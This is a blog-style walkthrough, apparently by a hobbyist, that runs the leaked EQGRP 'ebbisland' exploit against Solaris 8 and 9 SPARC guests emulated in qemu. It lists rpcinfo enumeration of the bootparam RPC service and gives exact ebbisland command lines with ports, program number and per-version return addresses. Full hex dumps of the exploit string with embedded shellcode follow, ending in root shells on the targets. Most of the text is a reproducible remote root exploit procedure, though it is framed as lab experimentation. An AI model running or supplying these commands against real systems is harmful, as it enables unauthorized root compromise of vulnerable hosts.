So after we have managed to fully virtualize Solaris 5.6/5.7/5.8 and 5.9 via qemu-system-sparc on x86_64 Linux host we can move onto testing the infamous Shadowbrokers leaked Solaris hacking tools – mainly the notorious ebbisland
If you want to experiment a git clone of the EQGRP dump is located here https://github.com/x0rz/EQGRP
So lets fire up our first test case – Solaris 5.9 (sparc) via qemu-system-sparc as it was described here ( https://astr0baby.wordpress.com/2019/02/23/running-solaris-2-9-sparc-on-qemu-system-sparc-in-linux-x86_64-mint-19/) We need to make sure the rpc.bootparamd is running on the target (needed for this example)
On our host Linux machine we need to ensure that the vulnerable rpc service(bootparam) is running. You must be able to reach the target system’s TCP port that the designated target RPC is listening upon, so we will use rpcinfo to query the remote rpc services
Make sure you have it installed -> apt-get install rpcbind nfs-common
user@panasonic ~/SHADOWBROKERS/EQGRP-master/Linux/bin $ rpcinfo -p 10.0.2.10 program vers proto port service 100000 4 tcp 111 portmapper 100000 3 tcp 111 portmapper 100000 2 tcp 111 portmapper 100000 4 udp 111 portmapper 100000 3 udp 111 portmapper 100000 2 udp 111 portmapper 100232 10 udp 32772 100083 1 tcp 32771 100221 1 tcp 32772 100229 1 tcp 32773 100229 2 tcp 32773 100230 1 tcp 32774 100242 1 tcp 32775 100422 1 tcp 32776 100068 2 udp 32773 100068 3 udp 32773 100068 4 udp 32773 100068 5 udp 32773 100011 1 udp 32774 rquotad 100001 2 udp 32775 rstatd 100001 3 udp 32775 rstatd 100001 4 udp 32775 rstatd 100002 2 udp 32776 rusersd 100002 3 udp 32776 rusersd 100002 2 tcp 32777 rusersd 100002 3 tcp 32777 rusersd 100008 1 udp 32777 walld 100012 1 udp 32778 sprayd 100024 1 udp 32779 status 100024 1 tcp 32778 status 100133 1 udp 32779 100133 1 tcp 32778 100021 1 udp 4045 nlockmgr 100021 2 udp 4045 nlockmgr 100021 3 udp 4045 nlockmgr 100021 4 udp 4045 nlockmgr 100021 1 tcp 4045 nlockmgr 100021 2 tcp 4045 nlockmgr 100021 3 tcp 4045 nlockmgr 100021 4 tcp 4045 nlockmgr 300598 1 udp 32785 300598 1 tcp 32782 805306368 1 udp 32785 805306368 1 tcp 32782 100249 1 udp 32786 100249 1 tcp 32783 1289637086 5 tcp 32784 1289637086 1 tcp 32784 100026 1 udp 32806 bootparam 100026 1 tcp 32848 bootparam
We can see from the above the vulnerable TCP ports 32806 and 32848 so we can execute ebbisland as follows
user@panasonic ~/SHADOWBROKERS/EQGRP-master/Linux/bin $ ./ebbisland -t 10.0.2.10 -p 32848 -r 100026 -X -N -A 0x6e908
The exploit takes a couple of seconds to complete and is quite reliable
user@panasonic ~/SHADOWBROKERS/EQGRP-master/Linux/bin $ ./ebbisland -t 10.0.2.10 -p 32848 -r 100026 -X -N -A 0x6e908 ./ebbisland version 1.0.0.0 ************************************ **** WARNING - non - inetd mode **** ************************************ auth len 192 lz addr: 0x6e9f4, codeAddr: 0x6e94c jumpOffset: 0x1c landing zone size: 1024 Address range covered: 0x6e70c -> 0x6eb08 Ok to continue? y Exploit string: 80 00 04 e8 73 d5 72 cb 00 00 00 00 00 00 00 02 ....s.r......... 00 01 86 ba 00 00 00 00 00 00 00 00 00 00 55 de ..............U. 00 00 00 c0 5c 74 67 c3 00 00 00 09 31 32 37 2e ....\tg.....127. 30 2e 30 2e 31 00 00 00 00 00 00 00 00 00 00 00 0.0.1........... 00 00 00 28 82 10 20 06 90 10 20 02 91 d0 20 08 ...(.. ... ... . 90 10 20 01 91 d0 20 08 91 d0 20 08 82 10 20 1b .. ... ... ... . 91 d0 20 08 b0 10 24 00 82 10 20 29 90 10 00 18 .. ...$... ).... 91 d0 20 08 2a bf ff fd b0 a6 20 01 91 d0 20 08 .. .*..... ... . 91 d0 20 08 11 0b d8 98 90 02 29 6e 13 0b dc d8 .. .......)n.... 92 02 68 00 d0 3b bf e0 90 23 a0 20 92 23 a0 18 ..h..;...#. .#.. 96 23 a0 1b d6 22 40 00 c0 22 60 04 82 10 20 0b .#..."@.."`... . 91 d0 20 08 90 1a 00 08 82 10 20 01 91 d0 20 08 .. ....... ... . 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 06 eb dc ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 06 eb 4c ...............L 00 06 eb 48 00 06 eb 44 00 06 eb 40 00 06 eb 3c ...H...D...@...< 00 06 eb 38 00 06 eb 34 00 06 eb 30 00 06 eb 2c ...8...4...0..., 00 06 eb 28 00 06 eb 24 00 06 eb 20 00 06 eb 1c ...(...$... .... 00 06 eb 18 00 06 eb 14 00 06 eb 10 00 06 eb 0c ................ 00 06 eb 08 00 06 eb 04 00 06 eb 00 00 06 ea fc ................ 00 06 ea f8 00 06 ea f4 00 06 ea f0 00 06 ea ec ................ 00 06 ea e8 00 06 ea e4 00 06 ea e0 00 06 ea dc ................ 00 06 ea d8 00 06 ea d4 00 06 ea d0 00 06 ea cc ................ 00 06 ea c8 00 06 ea c4 00 06 ea c0 00 06 ea bc ................ 00 06 ea b8 00 06 ea b4 00 06 ea b0 00 06 ea ac ................ 00 06 ea a8 00 06 ea a4 00 06 ea a0 00 06 ea 9c ................ 00 06 ea 98 00 06 ea 94 00 06 ea 90 00 06 ea 8c ................ 00 06 ea 88 00 06 ea 84 00 06 ea 80 00 06 ea 7c ...............| 00 06 ea 78 00 06 ea 74 00 06 ea 70 00 06 ea 6c ...x...t...p...l 00 06 ea 68 00 06 ea 64 00 06 ea 60 00 06 ea 5c ...h...d...`...\ 00 06 ea 58 00 06 ea 54 00 06 ea 50 00 06 ea 4c ...X...T...P...L 00 06 ea 48 00 06 ea 44 00 06 ea 40 00 06 ea 3c ...H...D...@...< 00 06 ea 38 00 06 ea 34 00 06 ea 30 00 06 ea 2c ...8...4...0..., 00 06 ea 28 00 06 ea 24 00 06 ea 20 00 06 ea 1c ...(...$... .... 00 06 ea 18 00 06 ea 14 00 06 ea 10 00 06 ea 0c ................ 00 06 ea 08 00 06 ea 04 00 06 ea 00 00 06 e9 fc ................ 00 06 e9 f8 00 06 e9 f4 00 06 e9 f0 00 06 e9 ec ................ 00 06 e9 e8 00 06 e9 e4 00 06 e9 e0 00 06 e9 dc ................ 00 06 e9 d8 00 06 e9 d4 00 06 e9 d0 00 06 e9 cc ................ 00 06 e9 c8 00 06 e9 c4 00 06 e9 c0 00 06 e9 bc ................ 00 06 e9 b8 00 06 e9 b4 00 06 e9 b0 00 06 e9 ac ................ 00 06 e9 a8 00 06 e9 a4 00 06 e9 a0 00 06 e9 9c ................ 00 06 e9 98 00 06 e9 94 00 06 e9 90 00 06 e9 8c ................ 00 06 e9 88 00 06 e9 84 00 06 e9 80 00 06 e9 7c ...............| 00 06 e9 78 00 06 e9 74 00 06 e9 70 00 06 e9 6c ...x...t...p...l 00 06 e9 68 00 06 e9 64 00 06 e9 60 00 06 e9 5c ...h...d...`...\ 00 06 e9 58 00 06 e9 54 00 06 e9 50 00 06 e9 4c ...X...T...P...L 00 06 e9 48 00 06 e9 44 00 06 e9 40 00 06 e9 3c ...H...D...@...< 00 06 e9 38 00 06 e9 34 00 06 e9 30 00 06 e9 2c ...8...4...0..., 00 06 e9 28 00 06 e9 24 00 06 e9 20 00 06 e9 1c ...(...$... .... 00 06 e9 18 00 06 e9 14 00 06 e9 10 00 06 e9 0c ................ 00 06 e9 08 00 06 e9 04 00 06 e9 00 00 06 e8 fc ................ 00 06 e8 f8 00 06 e8 f4 00 06 e8 f0 00 06 e8 ec ................ 00 06 e8 e8 00 06 e8 e4 00 06 e8 e0 00 06 e8 dc ................ 00 06 e8 d8 00 06 e8 d4 00 06 e8 d0 00 06 e8 cc ................ 00 06 e8 c8 00 06 e8 c4 00 06 e8 c0 00 06 e8 bc ................ 00 06 e8 b8 00 06 e8 b4 00 06 e8 b0 00 06 e8 ac ................ 00 06 e8 a8 00 06 e8 a4 00 06 e8 a0 00 06 e8 9c ................ 00 06 e8 98 00 06 e8 94 00 06 e8 90 00 06 e8 8c ................ 00 06 e8 88 00 06 e8 84 00 06 e8 80 00 06 e8 7c ...............| 00 06 e8 78 00 06 e8 74 00 06 e8 70 00 06 e8 6c ...x...t...p...l 00 06 e8 68 00 06 e8 64 00 06 e8 60 00 06 e8 5c ...h...d...`...\ 00 06 e8 58 00 06 e8 54 00 06 e8 50 00 06 e8 4c ...X...T...P...L 00 06 e8 48 00 06 e8 44 00 06 e8 40 00 06 e8 3c ...H...D...@...< 00 06 e8 38 00 06 e8 34 00 06 e8 30 00 06 e8 2c ...8...4...0..., 00 06 e8 28 00 06 e8 24 00 06 e8 20 00 06 e8 1c ...(...$... .... 00 06 e8 18 00 06 e8 14 00 06 e8 10 00 06 e8 0c ................ 00 06 e8 08 00 06 e8 04 00 06 e8 00 00 06 e7 fc ................ 00 06 e7 f8 00 06 e7 f4 00 06 e7 f0 00 06 e7 ec ................ 00 06 e7 e8 00 06 e7 e4 00 06 e7 e0 00 06 e7 dc ................ 00 06 e7 d8 00 06 e7 d4 00 06 e7 d0 00 06 e7 cc ................ 00 06 e7 c8 00 06 e7 c4 00 06 e7 c0 00 06 e7 bc ................ 00 06 e7 b8 00 06 e7 b4 00 06 e7 b0 00 06 e7 ac ................ 00 06 e7 a8 00 06 e7 a4 00 06 e7 a0 00 06 e7 9c ................ 00 06 e7 98 00 06 e7 94 00 06 e7 90 00 06 e7 8c ................ 00 06 e7 88 00 06 e7 84 00 06 e7 80 00 06 e7 7c ...............| 00 06 e7 78 00 06 e7 74 00 06 e7 70 00 06 e7 6c ...x...t...p...l 00 06 e7 68 00 06 e7 64 00 06 e7 60 00 06 e7 5c ...h...d...`...\ 00 06 e7 58 00 06 e7 54 00 06 e7 50 ...X...T...P Timed out waiting for RPC response id uid=0(root) gid=1(other) pwd /usr/sbin uname -a SunOS solaris9 5.9 Generic_118558-34 sun4m sparc SUNW,SPARCstation-5
Similar approach was tested against Solaris 5.8 (sparc) except the address was different
Querying the remote rpc service
user@panasonic ~/SHADOWBROKERS/EQGRP-master/Linux/bin $ rpcinfo -p 10.0.2.10 | grep bootparam 100026 1 udp 32806 bootparam 100026 1 tcp 32854 bootparam
user@panasonic ~/SHADOWBROKERS/EQGRP-master/Linux/bin $ ./ebbisland -t 10.0.2.10 -p 32854 -r 100026 -X -N -A 0x7c760 ./ebbisland version 1.0.0.0 ************************************ **** WARNING - non - inetd mode **** ************************************ auth len 192 lz addr: 0x7c84c, codeAddr: 0x7c7a4 jumpOffset: 0x1c landing zone size: 1024 Address range covered: 0x7c564 -> 0x7c960 Ok to continue? y Exploit string: 80 00 04 e8 71 6e f1 5f 00 00 00 00 00 00 00 02 ....qn._........ 00 01 86 ba 00 00 00 00 00 00 00 00 00 00 55 de ..............U. 00 00 00 c0 5c 74 72 d2 00 00 00 09 31 32 37 2e ....\tr.....127. 30 2e 30 2e 31 00 00 00 00 00 00 00 00 00 00 00 0.0.1........... 00 00 00 28 82 10 20 06 90 10 20 02 91 d0 20 08 ...(.. ... ... . 90 10 20 01 91 d0 20 08 91 d0 20 08 82 10 20 1b .. ... ... ... . 91 d0 20 08 b0 10 24 00 82 10 20 29 90 10 00 18 .. ...$... ).... 91 d0 20 08 2a bf ff fd b0 a6 20 01 91 d0 20 08 .. .*..... ... . 91 d0 20 08 11 0b d8 98 90 02 29 6e 13 0b dc d8 .. .......)n.... 92 02 68 00 d0 3b bf e0 90 23 a0 20 92 23 a0 18 ..h..;...#. .#.. 96 23 a0 1b d6 22 40 00 c0 22 60 04 82 10 20 0b .#..."@.."`... . 91 d0 20 08 90 1a 00 08 82 10 20 01 91 d0 20 08 .. ....... ... . 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ca 34 ...............4 00 00 00 00 00 00 00 00 00 00 00 00 00 07 c9 a4 ................ 00 07 c9 a0 00 07 c9 9c 00 07 c9 98 00 07 c9 94 ................ 00 07 c9 90 00 07 c9 8c 00 07 c9 88 00 07 c9 84 ................ 00 07 c9 80 00 07 c9 7c 00 07 c9 78 00 07 c9 74 .......|...x...t 00 07 c9 70 00 07 c9 6c 00 07 c9 68 00 07 c9 64 ...p...l...h...d 00 07 c9 60 00 07 c9 5c 00 07 c9 58 00 07 c9 54 ...`...\...X...T 00 07 c9 50 00 07 c9 4c 00 07 c9 48 00 07 c9 44 ...P...L...H...D 00 07 c9 40 00 07 c9 3c 00 07 c9 38 00 07 c9 34 ...@...<...8...4 00 07 c9 30 00 07 c9 2c 00 07 c9 28 00 07 c9 24 ...0...,...(...$ 00 07 c9 20 00 07 c9 1c 00 07 c9 18 00 07 c9 14 ... ............ 00 07 c9 10 00 07 c9 0c 00 07 c9 08 00 07 c9 04 ................ 00 07 c9 00 00 07 c8 fc 00 07 c8 f8 00 07 c8 f4 ................ 00 07 c8 f0 00 07 c8 ec 00 07 c8 e8 00 07 c8 e4 ................ 00 07 c8 e0 00 07 c8 dc 00 07 c8 d8 00 07 c8 d4 ................ 00 07 c8 d0 00 07 c8 cc 00 07 c8 c8 00 07 c8 c4 ................ 00 07 c8 c0 00 07 c8 bc 00 07 c8 b8 00 07 c8 b4 ................ 00 07 c8 b0 00 07 c8 ac 00 07 c8 a8 00 07 c8 a4 ................ 00 07 c8 a0 00 07 c8 9c 00 07 c8 98 00 07 c8 94 ................ 00 07 c8 90 00 07 c8 8c 00 07 c8 88 00 07 c8 84 ................ 00 07 c8 80 00 07 c8 7c 00 07 c8 78 00 07 c8 74 .......|...x...t 00 07 c8 70 00 07 c8 6c 00 07 c8 68 00 07 c8 64 ...p...l...h...d 00 07 c8 60 00 07 c8 5c 00 07 c8 58 00 07 c8 54 ...`...\...X...T 00 07 c8 50 00 07 c8 4c 00 07 c8 48 00 07 c8 44 ...P...L...H...D 00 07 c8 40 00 07 c8 3c 00 07 c8 38 00 07 c8 34 ...@...<...8...4 00 07 c8 30 00 07 c8 2c 00 07 c8 28 00 07 c8 24 ...0...,...(...$ 00 07 c8 20 00 07 c8 1c 00 07 c8 18 00 07 c8 14 ... ............ 00 07 c8 10 00 07 c8 0c 00 07 c8 08 00 07 c8 04 ................ 00 07 c8 00 00 07 c7 fc 00 07 c7 f8 00 07 c7 f4 ................ 00 07 c7 f0 00 07 c7 ec 00 07 c7 e8 00 07 c7 e4 ................ 00 07 c7 e0 00 07 c7 dc 00 07 c7 d8 00 07 c7 d4 ................ 00 07 c7 d0 00 07 c7 cc 00 07 c7 c8 00 07 c7 c4 ................ 00 07 c7 c0 00 07 c7 bc 00 07 c7 b8 00 07 c7 b4 ................ 00 07 c7 b0 00 07 c7 ac 00 07 c7 a8 00 07 c7 a4 ................ 00 07 c7 a0 00 07 c7 9c 00 07 c7 98 00 07 c7 94 ................ 00 07 c7 90 00 07 c7 8c 00 07 c7 88 00 07 c7 84 ................ 00 07 c7 80 00 07 c7 7c 00 07 c7 78 00 07 c7 74 .......|...x...t 00 07 c7 70 00 07 c7 6c 00 07 c7 68 00 07 c7 64 ...p...l...h...d 00 07 c7 60 00 07 c7 5c 00 07 c7 58 00 07 c7 54 ...`...\...X...T 00 07 c7 50 00 07 c7 4c 00 07 c7 48 00 07 c7 44 ...P...L...H...D 00 07 c7 40 00 07 c7 3c 00 07 c7 38 00 07 c7 34 ...@...<...8...4 00 07 c7 30 00 07 c7 2c 00 07 c7 28 00 07 c7 24 ...0...,...(...$ 00 07 c7 20 00 07 c7 1c 00 07 c7 18 00 07 c7 14 ... ............ 00 07 c7 10 00 07 c7 0c 00 07 c7 08 00 07 c7 04 ................ 00 07 c7 00 00 07 c6 fc 00 07 c6 f8 00 07 c6 f4 ................ 00 07 c6 f0 00 07 c6 ec 00 07 c6 e8 00 07 c6 e4 ................ 00 07 c6 e0 00 07 c6 dc 00 07 c6 d8 00 07 c6 d4 ................ 00 07 c6 d0 00 07 c6 cc 00 07 c6 c8 00 07 c6 c4 ................ 00 07 c6 c0 00 07 c6 bc 00 07 c6 b8 00 07 c6 b4 ................ 00 07 c6 b0 00 07 c6 ac 00 07 c6 a8 00 07 c6 a4 ................ 00 07 c6 a0 00 07 c6 9c 00 07 c6 98 00 07 c6 94 ................ 00 07 c6 90 00 07 c6 8c 00 07 c6 88 00 07 c6 84 ................ 00 07 c6 80 00 07 c6 7c 00 07 c6 78 00 07 c6 74 .......|...x...t 00 07 c6 70 00 07 c6 6c 00 07 c6 68 00 07 c6 64 ...p...l...h...d 00 07 c6 60 00 07 c6 5c 00 07 c6 58 00 07 c6 54 ...`...\...X...T 00 07 c6 50 00 07 c6 4c 00 07 c6 48 00 07 c6 44 ...P...L...H...D 00 07 c6 40 00 07 c6 3c 00 07 c6 38 00 07 c6 34 ...@...<...8...4 00 07 c6 30 00 07 c6 2c 00 07 c6 28 00 07 c6 24 ...0...,...(...$ 00 07 c6 20 00 07 c6 1c 00 07 c6 18 00 07 c6 14 ... ............ 00 07 c6 10 00 07 c6 0c 00 07 c6 08 00 07 c6 04 ................ 00 07 c6 00 00 07 c5 fc 00 07 c5 f8 00 07 c5 f4 ................ 00 07 c5 f0 00 07 c5 ec 00 07 c5 e8 00 07 c5 e4 ................ 00 07 c5 e0 00 07 c5 dc 00 07 c5 d8 00 07 c5 d4 ................ 00 07 c5 d0 00 07 c5 cc 00 07 c5 c8 00 07 c5 c4 ................ 00 07 c5 c0 00 07 c5 bc 00 07 c5 b8 00 07 c5 b4 ................ 00 07 c5 b0 00 07 c5 ac 00 07 c5 a8 ............ Timed out waiting for RPC response id uid=0(root) gid=1(other) uname -a SunOS solaris8 5.8 Generic_108528-13 sun4m sparc SUNW,SPARCstation-5
The parameters were taken from the original ebbisland help file located here
https://fdik.org/EQGRP/Linux/etc/opscript.txt
Video demonstration of the above